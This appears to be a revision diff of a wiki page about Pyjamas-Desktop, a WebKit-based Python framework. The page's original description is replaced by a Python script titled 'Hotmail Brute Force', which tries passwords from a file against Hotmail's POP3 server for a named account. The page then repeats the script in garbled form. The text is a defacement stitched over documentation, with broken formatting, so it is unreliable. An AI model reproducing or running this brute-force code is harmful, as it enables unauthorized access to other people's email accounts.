Differences between revisions 1 and 20 (spanning 19 versions)
Revision 1 as of 2008-08-31 21:26:23
Size: 329
Editor: 87
Comment:
Revision 20 as of 2010-10-11 09:16:41
Size: 865
Editor: 188
Comment:
Deletions are marked like this. Additions are marked like this.
Line 1: Line 1:
Pyjamas-Desktop is a cross-platform framework and applications widget set, based on [http://webkit.org WebKit]. PyWebkitGtk is currently the basis for Pyjamas-Desktop, and it is conceivable that there will exist a PyWebkitQt4, and Pyjamas-Desktop will run on top of that, as well. import poplib
from winsound import Beep
print '''
========================================
| Hotmail Brute Force |
| Str1k3r |
| h4moud@hotmail.com |
| Iam Hamoud \ thanks for Ricardo |
| [Str1k3r,nj] |
========================================'''
print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n"
def con(pwd):
    M = poplib.POP3_SSL('pop3.live.com', 995)
    try:
        M.user("t2-@hotmail.com")
        M.pass_(pwd)
    except:
        print "[-]password incorrect"
    else:
        print '[+]Email Has been Cracked!','\n[+]Password:', pwd
 Beep(3000,800)
        exit()
Line 3: Line 24:
[http://code.google.com/p/pyjamas Pyjamas] f = open("Str1k3r.txt", "r")
for pwd in f.readlines():
    con(pwd.replace("\r", "").replace("\n", ""))

import poplib from winsound import Beep print ======================================== | Hotmail Brute Force | | Str1k3r | | h4moud@hotmail.com | | Iam Hamoud \ thanks for Ricardo | | [Str1k3r,nj] | ======================================== print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n" def con(pwd):

  • M = poplib.POP3_SSL('pop3.live.com', 995) try: except:
    • print "[-]password incorrect"
    else:
    • print '[+]Email Has been Cracked!','\n[+]Password:', pwd Beep(3000,800) exit()

f = open("Str1k3r.txt", "r") for pwd in f.readlines():

  • con(pwd.replace("\r", "").replace("\n", ""))

PyjamasDesktop (last edited 2010-11-08 11:08:49 by 213)

Unable to edit the page? See the FrontPage for instructions.